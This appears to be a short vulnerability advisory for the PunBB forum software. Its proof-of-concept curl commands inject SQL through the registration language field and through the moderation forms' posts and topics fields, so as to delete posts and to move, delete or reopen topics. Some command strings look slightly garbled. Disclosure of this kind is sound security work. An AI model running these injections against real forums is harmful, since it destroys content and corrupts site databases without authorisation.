|
PunBB Multiple Remote Input Validation Vulnerabilities
No exploit is required to leverage any of these issues. The following proof of concepts have been provided: This example demonstrates the SQL injection vulnerability in the language parameter: curl --form form_sent=1 --form req_username=sha --form req_password1=passwd --form req_paspasswd --form req_email1=sha@punbb.com --form language="English', 'Oxygen', 0, '0.0.0.0', 0) -- " http://target/register.php?action=registerer Attacks delete posts: curl --referer http://www.example.com/moderate.php --form posts="0) -- this won't show" --form delete_posts_comply=1 --cookie punbb_cookie=<valid cookie> target/moderate.php?fid=1\&tid=1 Attacks move topics: curl --referer http://www.example.com/moderate.php --form topics="2) -- this won't show" --form move_to_forum=2 --form move_topics=1 --form move_topics_to=1 --cookie punbb_cookie=<valid cookie> target/moderate.php?fid=1 Attacks delete topics: curl --referer http://www.example.com/moderate.php --form topics="2) -- this won't show" --form delete_topics=1 --form delete_topics_comply=1 --cookie punbb_cookie=<valid cookie> target/moderate.php?fid=1 Attacks open/close: curl --referer http://www.example.com/moderate.php --form "topics[0) -- this won't show]"= --form open=1 --cookie "punbb_cookie=<valid cookie> target/moderate.php?fid=1 |
|
 Privacy Statement |
